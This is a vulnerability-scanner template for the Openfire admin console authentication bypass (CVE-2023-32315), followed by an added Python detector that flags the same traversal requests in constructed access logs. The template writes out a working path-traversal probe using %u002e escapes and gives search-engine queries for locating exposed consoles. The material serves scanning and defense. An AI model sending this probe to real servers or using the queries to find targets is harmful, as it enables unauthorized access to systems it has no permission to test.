Vulnerability description
Openfire is a free, open-source real-time collaboration server based on the Extensible Messaging and Presence Protocol (XMPP) and written in Java. When an attacker can reach the Openfire admin console, an unauthenticated attacker can bypass authentication to add an administrator user, and from there execute arbitrary code and take control of the server.
FOFA: app="Openfire-管理界面"
SHODAN: title:"openfire"
id: CVE-2023-32315

info:
  name: Openfire Console authentication bypass
  author: laohuan12138
  severity: high
  verified: true
  description: |
    Openfire is a free, open-source real-time collaboration server based on the Extensible Messaging and Presence Protocol (XMPP) and written in Java. When an attacker can reach the Openfire admin console, an unauthenticated attacker can bypass authentication to add an administrator user, and from there execute arbitrary code and take control of the server.
    FOFA: app="Openfire-管理界面"
    SHODAN: title:"openfire"
  reference:
    - https://github.com/advisories/GHSA-gw42-f939-fhvm
    - https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
  tags: cve,cve2023,auth-bypass,openfire,console
  created: 2023/06/15

set:
  hostname: request.url.host
  baseurl: request.url
rules:
  r0:
    request:
      raw: |
        GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
        Host: {{hostname}}
        Origin: {{baseurl}}
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'apache') &&
      response.body.bcontains(b'java') &&
      response.body.bcontains(b'openfire') &&
      response.body.bcontains(b'jivesoftware')
expression: r0()
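The rule above fingerprints a vulnerable console by requesting a path under the unauthenticated setup prefix `/setup/setup-s/` with `%u002e%u002e` in place of `..`, so that the traversal survives the container's path normalization and reaches `log.jsp`. The same shape is what a defender wants to look for in access logs. The following Python detector is an added example, not part of the original afrog template or of Openfire itself: it decodes the non-standard `%uXXXX` escapes (and ordinary `%XX` escapes), flags any request that starts under the setup prefix but uses `..` segments to escape it, and reports where the path actually resolves. The log lines, client addresses and timestamps are constructed for the example in Combined Log Format, as a reverse proxy in front of the console might write them.

```python
"""Flag CVE-2023-32315 probe attempts in access logs for the Openfire admin console.

Added example, not part of the original afrog template or of Openfire itself.
It mirrors the request the rule sends: a path under /setup/setup-s/ that, once
%uXXXX escapes (and ordinary %XX escapes) are decoded, contains a '..' segment.
"""
import posixpath
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample log (Combined Log Format): one ordinary login-page hit,
# three traversal probes (unicode-escaped, percent-escaped, raw) and one
# benign request under the setup prefix. Addresses and times are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jun/2023:10:01:02 +0000] "GET /login.jsp HTTP/1.1" 200 1532
203.0.113.7 - - [15/Jun/2023:10:01:09 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 200 8812
203.0.113.7 - - [15/Jun/2023:10:01:11 +0000] "GET /setup/setup-s/%2e%2e/%2e%2e/log.jsp HTTP/1.1" 200 8812
203.0.113.9 - - [15/Jun/2023:10:02:30 +0000] "GET /setup/setup-s/../../log.jsp HTTP/1.1" 403 0
203.0.113.9 - - [15/Jun/2023:10:02:31 +0000] "GET /setup/index.jsp HTTP/1.1" 302 0
"""

# Prefix that the console serves without authentication during setup.
SETUP_PREFIX = "/setup/setup-s/"

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Non-standard %uXXXX escape, which servlet containers do not normalize.
_UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_path(path: str) -> str:
    """Decode %uXXXX escapes first, then ordinary %XX escapes, so that
    encoded traversal dots become literal '.' characters."""
    path = _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), path)
    return unquote(path)


def is_setup_traversal(path: str) -> bool:
    """True when the request starts under the unauthenticated setup prefix
    but contains a '..' segment that escapes it."""
    decoded = decode_path(path).split("?", 1)[0]
    if not decoded.startswith(SETUP_PREFIX):
        return False
    return ".." in decoded.split("/")


def find_bypass_attempts(log_text: str) -> List[Dict]:
    """Return one record per suspicious request: the raw and decoded path,
    the location the traversal resolves to, and the response status.
    Blocked probes (non-200) are reported too, so attempts stay visible."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or not is_setup_traversal(m["path"]):
            continue
        decoded = decode_path(m["path"]).split("?", 1)[0]
        hits.append({
            "client": m["client"],
            "time": m["time"],
            "raw": m["path"],
            "decoded": decoded,
            "resolved": posixpath.normpath(decoded),
            "status": int(m["status"]),
        })
    return hits


if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(f'{hit["client"]} {hit["status"]} {hit["raw"]} -> {hit["resolved"]}')
```

Run against the sample, the three probe lines are flagged and each resolves to `/log.jsp`, outside the setup prefix the request claimed to be under; the plain `/setup/index.jsp` request is not. Because the page notes that exploitation requires reaching the console in the first place, pairing this log check with network restrictions on the admin console port is the obvious complementary control.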